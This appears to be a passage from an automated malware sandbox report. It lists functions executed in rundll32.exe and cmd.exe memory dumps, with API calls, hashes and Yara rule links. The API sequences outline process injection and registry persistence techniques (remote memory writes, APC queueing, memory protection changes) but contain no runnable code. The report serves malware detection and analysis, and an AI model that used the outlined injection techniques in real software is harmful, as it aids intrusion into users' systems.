Opcode ID: 9f343b81a404651989f3f9f0b5b592a2ff01fa5f94f4769530cf8af684d2897f
Instruction ID: 5eedee4b81cf50abcfbb4f0a0a694b83c16f3d362ecfbe419d833a01ae76039f
Opcode Fuzzy Hash: 9f343b81a404651989f3f9f0b5b592a2ff01fa5f94f4769530cf8af684d2897f
Instruction Fuzzy Hash: 8E61427061CE099FD758EF18D485A66B7E1FB68301F60452EF88AC3661DB74EC45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A3B6BC, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00A3B802

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 331870967d993902157b8a4905222c45a87e1856e7a2f4686b05b3168d5d06c0
Instruction ID: a81b42dd582cc9c6f4d88140f7699f4fc71b5d0e1bcb0242c5262dbb30d89d4a
Opcode Fuzzy Hash: 331870967d993902157b8a4905222c45a87e1856e7a2f4686b05b3168d5d06c0
Instruction Fuzzy Hash: CC41D630628A0C8FDB68EF68E895966B3E1F799310F610569F04AC3261DA78DC87C791

Uniqueness

Uniqueness Score: -1.00%

Function 00A553F8, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00A5549C

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 32db88e9ab3ccb2070f31cb1f62e7900a4d68847bc4a5d7bf40b71305d8f2110
Instruction ID: cc6493a9a8f3f7baf8dcf3238e7f080ee74f8b4956b190003dcedc4a53e6a7d6
Opcode Fuzzy Hash: 32db88e9ab3ccb2070f31cb1f62e7900a4d68847bc4a5d7bf40b71305d8f2110
Instruction Fuzzy Hash: 2F311E7061CB498FDB64EF5C9485A66B7E1FB99311F00466EE84DC3262DB30EC458B86

Uniqueness

Uniqueness Score: -1.00%

Function 00A5581C, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00A558F9

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8469ce64e4e3db8b855376a342bc31c998407ad7561d29cbd285ed44b2515f89
Instruction ID: 6a7991615a6a8ab3aa48808d023421bdd93ad9e22407ad7f7393478b7d1e8735
Opcode Fuzzy Hash: 8469ce64e4e3db8b855376a342bc31c998407ad7561d29cbd285ed44b2515f89
Instruction Fuzzy Hash: 06318134714A058FEB68EF38EC9593A73E2FBD8351B044539A547C3651DE3CD806AB41

Uniqueness

Uniqueness Score: -1.00%

Function 00A39794, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00A39836

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 52e9a3d96fda1381486e273067ce54680418527cd34b2512e497aabd86f2b6c2
Instruction ID: 743908d53d76d5c5f9bceb8f0597ddea58c90d4838e2edcce699056ba140a3c7
Opcode Fuzzy Hash: 52e9a3d96fda1381486e273067ce54680418527cd34b2512e497aabd86f2b6c2
Instruction Fuzzy Hash: 9E21973571890C8FEBA8EF68A84623A77D1F799300F20452DE59FC3251DE64DC468781

Uniqueness

Uniqueness Score: -1.00%

Function 00A39C5C, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00A39D08

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4cc9e6a5b0aaab4bb33114c903492ce34404c7f7b4342cd030333fa700b26422
Instruction ID: 911b29d50d2b57bf875d912500bba7bb68f79e8029895e387f064745ed400c23
Opcode Fuzzy Hash: 4cc9e6a5b0aaab4bb33114c903492ce34404c7f7b4342cd030333fa700b26422
Instruction Fuzzy Hash: 05216071318F098FEBA4EF6DD888666B7E1FBA9301F10052DE50AC3260DF78D8418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00A59F70, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A59FA3

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 226a84bcf7833020b1f540641349e9d04c6df89edc4ac43279d2c8364b4625fb
Instruction ID: c2a75afa3f0c94df7b0d40d35aa94982c71d933e150ee366e647d6e02c0d897b
Opcode Fuzzy Hash: 226a84bcf7833020b1f540641349e9d04c6df89edc4ac43279d2c8364b4625fb
Instruction Fuzzy Hash: 6C11937120C7098FEB14EF58E485425B7E5EB98301B04053DED8AC7245EA70ED49CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00A4607C, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00A48844: NtWriteVirtualMemory.NTDLL ref: 00A48863

VirtualProtectEx.KERNELBASE ref: 00A460D0

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 9a462d8fb4381e4e5540914a9b6252cf2e57f1fd95271bcb0e591c35fe13e953
Instruction ID: f4ba3a575f580e2c87f662876efdd07f143dd867bf70253caa94cf22083167f4
Opcode Fuzzy Hash: 9a462d8fb4381e4e5540914a9b6252cf2e57f1fd95271bcb0e591c35fe13e953
Instruction Fuzzy Hash: C6017C70618B088FCB48EF9CA0C552AB7E0FB9C311B50456EE80DC7246DB70DD44CB86

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6080 Parent PID: 2904 rundll32.exeCOMMON

Executed Functions

Function 000001B888D24200, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 000001B888D242B4
NtQueryInformationToken.NTDLL ref: 000001B888D242FC
NtClose.NTDLL ref: 000001B888D24334

Strings

0, xrefs: 000001B888D2425F

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 82d3005e2ec6f9e1ba3e2abb36d5c477332dca223e8a68e3d4c881f2f4327504
Instruction ID: 26d0589ab2745988022a0e41bcf0bdf74758851b4e0c84afebc38555e8699f22
Opcode Fuzzy Hash: 82d3005e2ec6f9e1ba3e2abb36d5c477332dca223e8a68e3d4c881f2f4327504
Instruction Fuzzy Hash: CE413C30258B488FD764EF68D8C479AB7E6FBD9701F40492EE48EC3251DB349945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D27548, Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 000001B888D27615
GetUserNameA.ADVAPI32 ref: 000001B888D2784E

Part of subcall function 000001B888D1D7C0: CreateThread.KERNELBASE ref: 000001B888D1D7F0
Part of subcall function 000001B888D1D7C0: QueueUserAPC.KERNELBASE ref: 000001B888D1D807

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: eab1205d177f2554c9cad4958cdfb841b1a8b714eb958c65cdb1b37a11e61533
Instruction ID: 7f0eb612463d776b0b10fe6d59a8cad6eeb2e52b369347296c7d066962ffd8d5
Opcode Fuzzy Hash: eab1205d177f2554c9cad4958cdfb841b1a8b714eb958c65cdb1b37a11e61533
Instruction Fuzzy Hash: F172A171628A088FF768EF68EC85AA573E6F754700F50452ED44BC31A1DF38E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D3B00B, Relevance: 3.4, APIs: 2, Instructions: 352nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 000001B888D3B2A3
NtProtectVirtualMemory.NTDLL ref: 000001B888D3B332

Memory Dump Source

Source File: 0000001F.00000002.540477717.000001B888D3B000.00000040.00020000.sdmp, Offset: 000001B888D3B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e9f41c2b7305eaa9e138207fd01b8a8474948dfaa4fe834f3e2e2be2a952ca10
Instruction ID: 405fd19596080491de8123ee4fed8a7bf52e7a73d57af108b55d7ee86a8d72a2
Opcode Fuzzy Hash: e9f41c2b7305eaa9e138207fd01b8a8474948dfaa4fe834f3e2e2be2a952ca10
Instruction Fuzzy Hash: 0CB13731228B894FE768DF28D8C1BE9B3E6FB95300F94456DD48BC7252EB30A446C752

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D259E4, Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 000001B888D25A3E

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 24762473a32ee086b9eb70598c7ad1b661e883cceb95d3e836c27c253e15357a
Instruction ID: 369846e06dc3b53c824d7c21c61c214a306b15b2c9f9aa465c587a52e58461be
Opcode Fuzzy Hash: 24762473a32ee086b9eb70598c7ad1b661e883cceb95d3e836c27c253e15357a
Instruction Fuzzy Hash: C891B930628B098FE758EF28E885BA633E6F794711F44453DE58AC3191EF78E842C751

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D1B164, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000001B888D1B18A

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e37b66c4b92a1b40773e5e2e35638161dbf108b70afce818149c44752229e966
Instruction ID: ca3e8187d79fa77bcadc063888b30a6c721e9b9daf5fc0b393b9ecc2f108b927
Opcode Fuzzy Hash: e37b66c4b92a1b40773e5e2e35638161dbf108b70afce818149c44752229e966
Instruction Fuzzy Hash: 5C01A734228D0C4FE784EF6CD5C4A65B3EAFF98705F80446D9805C3150DB38D580CB11

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D0CB68, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 000001B888D0CCCF
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001B888D0CD49

Strings

, xrefs: 000001B888D0CC23

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptorlstrcmp
String ID:
API String ID: 735288309-3916222277
Opcode ID: f3edc52901811f7506c16f10e0dfd0b973d878cf9c272a53901dbaf2a4f13129
Instruction ID: a06342e673fe74bffa9e01979400ecf693a2ed2ca36a4d82adce462771596d08
Opcode Fuzzy Hash: f3edc52901811f7506c16f10e0dfd0b973d878cf9c272a53901dbaf2a4f13129
Instruction Fuzzy Hash: FB514D31628A484BE338BE19AC852B977DAE385710F54013DD9DAC3291DF209C43C7D7

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D1466C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000001B888D01EEC: RegCreateKeyA.ADVAPI32 ref: 000001B888D01F0F

RegQueryValueExA.KERNELBASE ref: 000001B888D146E0

Strings

(, xrefs: 000001B888D1472B
(, xrefs: 000001B888D146EC

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 79b8343bb0af69eddd8a37dabf74b61d41a1f37887125f18d628855fe0bafd98
Instruction ID: ad6be4bc9f65b008384c2a3128c245421e051c7f46f914954cb16ebf17849881
Opcode Fuzzy Hash: 79b8343bb0af69eddd8a37dabf74b61d41a1f37887125f18d628855fe0bafd98
Instruction Fuzzy Hash: 1341B2346247488FF794DF18E8887AAB3E6FB98305F504129D84AC3291DF78D941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D2C5C4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001B888D2C701

Strings

H, xrefs: 000001B888D2C5E8

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: c238962a3fa07e4d1838bce89e85050b2149dfe2f58e80bb112a2cbeb364851f
Instruction ID: d066f70945a4d1c26cddc641b2a957dfee867def31af95a771de3711a9bd3c62
Opcode Fuzzy Hash: c238962a3fa07e4d1838bce89e85050b2149dfe2f58e80bb112a2cbeb364851f
Instruction Fuzzy Hash: 78A1B630518F0A8FE754DF18E8887A6B7E5FB98715F50462ED449C3261EF38E846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D26B40, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000001B888D29F70: VirtualProtect.KERNELBASE ref: 000001B888D29FA3

VirtualProtect.KERNELBASE ref: 000001B888D26C61
VirtualProtect.KERNELBASE ref: 000001B888D26C84

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e847b7687cf1ef722bfd3925424ae8f99a4fae4f6502d916fc932d490f6fd38a
Instruction ID: 768bf313134ffdac357063a59e4bfac80e0156ae3220b1f99633c24e7e383c75
Opcode Fuzzy Hash: e847b7687cf1ef722bfd3925424ae8f99a4fae4f6502d916fc932d490f6fd38a
Instruction Fuzzy Hash: BB619F70628B098FE744EF18E889765B7E5FB98701F50066EE44EC3291DB38F940CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D264D8, Relevance: 3.2, APIs: 2, Instructions: 152COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 000001B888D2654B
RtlAddVectoredContinueHandler.NTDLL ref: 000001B888D2663F

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: aac374c7db173740de99583ebd5bce70f914f0f43564cf06a8166c59b6a93847
Instruction ID: 437dd4f3ce39b35110b56f0020be0885d9790fe634209c075e29f6e3916faaf5
Opcode Fuzzy Hash: aac374c7db173740de99583ebd5bce70f914f0f43564cf06a8166c59b6a93847
Instruction Fuzzy Hash: 4A51C430618B854FF754EF28F8547AA77D6EB98706F44096D944AD32A1DF3CE504CB11

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D240A8, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 000001B888D240E6
RegCloseKey.KERNELBASE ref: 000001B888D24153

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 068b066487bd6c1021a25dd1c927a041a76502c0f8dfc02713d2790afb282f83
Instruction ID: 70fa3edcad22dd8e8781342c32281962d6c6a9489f36d4cc0f4c0f8672ea51a6
Opcode Fuzzy Hash: 068b066487bd6c1021a25dd1c927a041a76502c0f8dfc02713d2790afb282f83
Instruction Fuzzy Hash: 86215330618A088FE758EF68E84976577E1FBA8311F10446EE889C3261DF74E841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D01EEC, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 000001B888D01F0F
RegOpenKeyA.ADVAPI32 ref: 000001B888D01F1C

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 1a11e0354ff453eb4079644fbf2a1b7d20cfffb3db12b2390f2ac9c967f3a1db
Instruction ID: 7ff0276a54991f10013ceebec0d735cf3d396fddcad378e7cd143da91d492e16
Opcode Fuzzy Hash: 1a11e0354ff453eb4079644fbf2a1b7d20cfffb3db12b2390f2ac9c967f3a1db
Instruction Fuzzy Hash: C711C431618A088FEF44EB5C9488B6ABBE5FBA8300F10052DE88EC33A1DF74C945C752

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D1D7C0, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 000001B888D1D7F0
QueueUserAPC.KERNELBASE ref: 000001B888D1D807

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 74ad3154cc97680a0f5f16fb0e28fb4fa3bdb5284cf7d3b8316e52726ceedce4
Instruction ID: f1ae4f1471e9c6d8a265a9f5a21ff6430dba13ac382ea5f0ac6b0bf49fb4932a
Opcode Fuzzy Hash: 74ad3154cc97680a0f5f16fb0e28fb4fa3bdb5284cf7d3b8316e52726ceedce4
Instruction Fuzzy Hash: EE019230718A084FEB84EF6DA84D379B7E2EB98711B14816AA44DC3360DF74CC81C781

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D06E98, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 000001B888D06FE3

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9f343b81a404651989f3f9f0b5b592a2ff01fa5f94f4769530cf8af684d2897f
Instruction ID: 73752f7af51a2698f9b5a9b7f4881e9856d7cf9e8f90de55f8247705a5a5a465
Opcode Fuzzy Hash: 9f343b81a404651989f3f9f0b5b592a2ff01fa5f94f4769530cf8af684d2897f
Instruction Fuzzy Hash: 5361853062CB059FE794EF18E485A65B7E5FB68701F60462EE44AC7251DF34EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D0B6BC, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 000001B888D0B802

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 331870967d993902157b8a4905222c45a87e1856e7a2f4686b05b3168d5d06c0
Instruction ID: daaba25f5bc64a3bd2bbc5b94d7a3bc95fb2dd9ea5f7f2efd990c78f7e0726be
Opcode Fuzzy Hash: 331870967d993902157b8a4905222c45a87e1856e7a2f4686b05b3168d5d06c0
Instruction Fuzzy Hash: 1D41FD3062CA0C8FEB64EF68E895AA673E5F798710FA10559E449C3262CF64DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D29F70, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 000001B888D29FA3

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 226a84bcf7833020b1f540641349e9d04c6df89edc4ac43279d2c8364b4625fb
Instruction ID: 81a52644157fd63a858215858d2c017fdedb3a7206bfffba808ca144cdfefde9
Opcode Fuzzy Hash: 226a84bcf7833020b1f540641349e9d04c6df89edc4ac43279d2c8364b4625fb
Instruction Fuzzy Hash: FF11B17120C7088FEB54EF58E485565B3EAEB98300B40053DE98AC3289EF74ED45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000001B888D09C5C, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 000001B888D09D08

Memory Dump Source

Source File: 0000001F.00000002.540196639.000001B888D01000.00000020.00020000.sdmp, Offset: 000001B888D01000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4cc9e6a5b0aaab4bb33114c903492ce34404c7f7b4342cd030333fa700b26422
Instruction ID: 41d46ca42ab5afd6b86d0417ed252110211be430461779d54dd6dfdca6ce0a57
Opcode Fuzzy Hash: 4cc9e6a5b0aaab4bb33114c903492ce34404c7f7b4342cd030333fa700b26422
Instruction Fuzzy Hash: A2215E71218B098FEBA4EF6DD88876A77E5FBA9301F500529E50AC3261DF38DC41C752

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: cmd.exe PID: 6088 Parent PID: 3352 cmd.exeCOMMON

Executed Functions

Function 037407E8, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,03758380), ref: 037407FF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2c91841d7e7c5474b7fa850a42d4d3a59b63f004164e054ed4ac46bd41b84db9
Instruction ID: 5222db461779d47e86b40bbea3a99acc200ae72379552fb43a95e9f4795af3f5
Opcode Fuzzy Hash: 2c91841d7e7c5474b7fa850a42d4d3a59b63f004164e054ed4ac46bd41b84db9
Instruction Fuzzy Hash: FFF05E71B002259FC720DF65D985E9BFBACEB05750B058158EA00DB290D330F945DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03748FC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0374AEED: GetLastError.KERNEL32(?,00000000), ref: 0374AF1A
Part of subcall function 0374AEED: VirtualQuery.KERNEL32(?,?,-663CDE20,?,00000000), ref: 0374AF31

GetLastError.KERNEL32(00000000,00000004,?,?,?,00000000,?,037545F0,0000001C,03745A26,00000002,?,00000001,?,?,?), ref: 03749122

Part of subcall function 03749797: lstrlen.KERNEL32(?,?), ref: 037497CF
Part of subcall function 03749797: lstrcpy.KERNEL32(00000000,?), ref: 037497E6
Part of subcall function 03749797: StrChrA.SHLWAPI(00000000,0000002E), ref: 037497EF
Part of subcall function 03749797: GetModuleHandleA.KERNEL32(00000000), ref: 0374980D

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,?), ref: 0374909F
VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,?,00000000,?,037545F0,0000001C,03745A26), ref: 037490BA
RtlEnterCriticalSection.NTDLL(03758380), ref: 037490DF
RtlLeaveCriticalSection.NTDLL(03758380), ref: 037490FD

Part of subcall function 0374AEED: SetLastError.KERNEL32(?,?,00000000), ref: 0374AF5F

Strings

, xrefs: 0374908E

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorLastVirtual$CriticalProtectSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 11654437-3916222277
Opcode ID: 55cb7960207b0d81c6a333f0c5b3c02ebbfe26aff197bc5f4cd4eee05e76d6cf
Instruction ID: c10a9f6a67aa82f26d79c612e8258cd35e3c87c928e3daaa16f6d5017ef1f181
Opcode Fuzzy Hash: 55cb7960207b0d81c6a333f0c5b3c02ebbfe26aff197bc5f4cd4eee05e76d6cf
Instruction Fuzzy Hash: 94418DB5900709EFDB14DF65D849AAEFBB4FF09310F048219E919AB250D774EA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0374C92E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

lstrcpy.KERNEL32(?,00000020), ref: 0374CA2B
lstrcat.KERNEL32(?,00000020), ref: 0374CA40
lstrcmp.KERNEL32(00000000,?), ref: 0374CA57
lstrlen.KERNEL32(?,?,0375812C,00000000,03758108), ref: 0374CA7B

Strings

, xrefs: 0374C9C4

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 793c27354e995e1c34e92151d9d1432e58203d099e16193f3f54ee4b1bc704c9
Instruction ID: 9ff583b24ca654afb19e7b35f235d1be5520d12acf60b53b31b5ccb74c76d499
Opcode Fuzzy Hash: 793c27354e995e1c34e92151d9d1432e58203d099e16193f3f54ee4b1bc704c9
Instruction Fuzzy Hash: A651A135A0120AFBCF22CF99C4847ADFBB6FF45310F19809AE8559B201C771EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03745D54, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000,?), ref: 03745D75
GetProcAddress.KERNEL32(00000000,?), ref: 03745D8E
OpenProcess.KERNEL32(00000400,00000000,03758108,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?), ref: 03745DAB
IsWow64Process.KERNEL32(?,00000000,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000), ref: 03745DBC
FindCloseChangeNotification.KERNELBASE(?,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000,?), ref: 03745DCF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID:
API String ID: 1712524627-0
Opcode ID: ceac10969f9465e0e537c6da4a53b75596f33430c20061c15ce020c19d0f90db
Instruction ID: 22ba06d8f1e6eaed652307e578da023ae29a67fd4b8a89218ec7a04522f96783
Opcode Fuzzy Hash: ceac10969f9465e0e537c6da4a53b75596f33430c20061c15ce020c19d0f90db
Instruction Fuzzy Hash: A8018472500308FFCB15EF66D84C89ABBF8FF863617248259E915E3108E7B46645CF51

Uniqueness

Uniqueness Score: -1.00%

Function 037447CF, Relevance: 4.6, APIs: 3, Instructions: 67memoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 03740788: RegCreateKeyA.ADVAPI32(80000001,037580C4,?), ref: 0374079D
Part of subcall function 03740788: lstrlen.KERNEL32(037580C4,00000000,00000000,0375706E,?,?,?,03739C58,00000001,00000000,?), ref: 037407C6

RtlAllocateHeap.NTDLL(00000000,?), ref: 0374481B
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,0373643A,00000000,?,?), ref: 03744851
RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,0373643A,00000000,?,?), ref: 0374485F

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 2798709597-0
Opcode ID: b642d1d1aa3aba58efd8e43b641e38ad569ec02f33c083422ced75526f09e120
Instruction ID: 2c65ad4243fdd6e9ea7f67578e03ee258fa2cd6a5352b62fa8d251d11eab0563
Opcode Fuzzy Hash: b642d1d1aa3aba58efd8e43b641e38ad569ec02f33c083422ced75526f09e120
Instruction Fuzzy Hash: 871188B650028CFFCF05AF95DC84CAE7BBEFB88240B15446AFA0193110E771AE51AF60

Uniqueness

Uniqueness Score: -1.00%

Function 03740788, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

